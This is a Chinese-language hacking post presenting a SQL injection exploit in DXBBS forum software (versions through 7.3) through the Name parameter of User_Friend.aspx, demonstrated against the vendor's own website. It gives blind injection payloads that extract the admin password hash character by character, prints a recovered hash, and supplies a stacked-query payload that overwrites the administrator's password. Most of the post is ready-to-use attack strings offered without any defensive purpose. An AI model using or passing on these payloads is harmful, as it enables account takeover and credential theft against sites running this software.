dxbbs漏洞(通杀7.3以前所有版本)

漏洞出现在User_Friend.aspx , 由于过滤不严，造成name允许注入, 不多说了，自己看吧。 ------------------------------------------------------------------------------------------- http://www.dxbbs.cn/ 这是DXBBS官方网站，版本是7.3，用的access数据库 在User_Friend.aspx?Action=Add&Name=admin加上'' 典型的过滤不严,由于是access,在没有工具的情况下，只能一个一个猜解了 默认管理员是admin, 我们来猜解admin的密码, 工具是老兵的注入浏览器，用的是asc转换猜解法, 我已经下载了一份源代码，可以看一下数据库结构 用户表:DXBBS_user 密码字段:user_pass http://www.dxbbs.cn/User_Friend. ... ;Name=admin'' {v} and ''a''=''a ， 因为后面还有一个单引号，没办法注释，所以只能这么构造注入语句，{v}是变量 首先使用语句确定密码长度 and (select top 1 len(user_pass) from DXBBS_user)=16 返回：好友已存在 说明密码的确是16位，经过了MD5加密 接下来猜解密码: 猜解第一位： and (select top 1 asc(mid(user_pass,1,1)) from dxbbs_user where user_name=''admin'')>=57 返回：数据不存在，猜测错误，说明密码第一位的ASC值小于57 and (select top 1 asc(mid(user_pass,1,1)) from dxbbs_user where user_name=''admin'')>=55 正确，说明密码第一位的ASC值大于等于55 and (select top 1 asc(mid(user_pass,1,1)) from dxbbs_user where user_name=''admin'')>=56 返回错误，说明密码第一位的ASC值大于小于56 既然大于等于55，小于56，那么这个数值就是55，ASC55对应的字符是:7,也就是说，密码第一位是7， 猜测密码第二位就是把 and (select top 1 asc(mid(user_pass,1,1)) from dxbbs_user where user_name=''admin'')>=57 改成 and (select top 1 asc(mid(user_pass,2,1)) from dxbbs_user where user_name=''admin'')>=57 后面的以此类推 5分钟后得到管理员密码：74e92e9ececa0ae7 这是MD5加密过的，至于怎么得到明文，不要问我，自己碰运气吧 下面介绍SQL版利用方法： ser_Friend.aspx?Action=Add&Name=大蝉;UPDATE [Dxbbs_user] set user_pass=''7a57a5a743894a0e'' where user_name=''admin'';-- name=后面一定要加上已经存在的用户，user_pass=后面加上你的密码，user_name=后面加上你要修改的账户，默认管理员是admin 结束。。。